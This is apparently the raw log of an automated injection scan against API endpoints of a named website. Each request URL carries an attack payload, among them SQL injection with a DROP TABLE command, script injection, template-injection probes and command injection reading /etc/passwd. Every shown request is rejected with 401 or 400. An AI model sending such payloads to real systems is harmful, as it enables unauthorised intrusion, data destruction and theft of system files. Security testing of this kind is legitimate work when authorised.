=== PHASE 3: API ENDPOINT INJECTION ===

--- Test: sqli_agentlib (GET) ---
URL: https://www.realwave.com/api/Academy/AgentLibrary?id=1'OR'1'='1
HTTP Code: 401
Response Headers:
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:28 GMT

Response Body (first 500 chars):

=========================================

--- Test: sqli_lessons (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?id=1;DROP+TABLE+users--
HTTP Code: 401
Response Headers:
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:28 GMT

Response Body (first 500 chars):

=========================================

--- Test: sqli_customers (GET) ---
URL: https://www.realwave.com/api/subscriptions/customers?email=test@test.com'+OR+'1'='1
HTTP Code: 401
Response Headers:
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:29 GMT

Response Body (first 500 chars):

=========================================

--- Test: xss_user_path (GET) ---
URL: https://www.realwave.com/api/user/<script>alert(1)</script>
HTTP Code: 400
Response Headers:
HTTP/2 400 
content-type: text/html; charset=us-ascii
server: Microsoft-HTTPAPI/2.0
date: Sat, 07 Feb 2026 05:45:29 GMT
content-length: 324

Response Body (first 500 chars):
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid URL</h2>
<hr><p>HTTP Error 400. The request URL is invalid.</p>
</BODY></HTML>

=========================================

--- Test: ssti_lessons_1 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?q=%7B%7B7*7%7D%7D
HTTP Code: 401
Response Headers:
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:30 GMT

Response Body (first 500 chars):

=========================================

--- Test: ssti_lessons_2 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?q=${7*7}
HTTP Code: 401
Response Headers:
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:30 GMT

Response Body (first 500 chars):

=========================================

--- Test: cmdi_file_1 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?file=;ls+-la
HTTP Code: 401
Response Headers:
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:32 GMT

Response Body (first 500 chars):

=========================================

--- Test: cmdi_file_2 (GET) ---
URL: https://www.realwave.com/api/Academy/Lessons?file=|cat+/etc/passwd
HTTP Code: 401
Response Headers:
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:32 GMT

Response Body (first 500 chars):

=========================================

--- Test: xss_post_agentlib (POST) ---
HTTP Code: 401
HTTP/2 401 
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:33 GMT

Body:

=========================================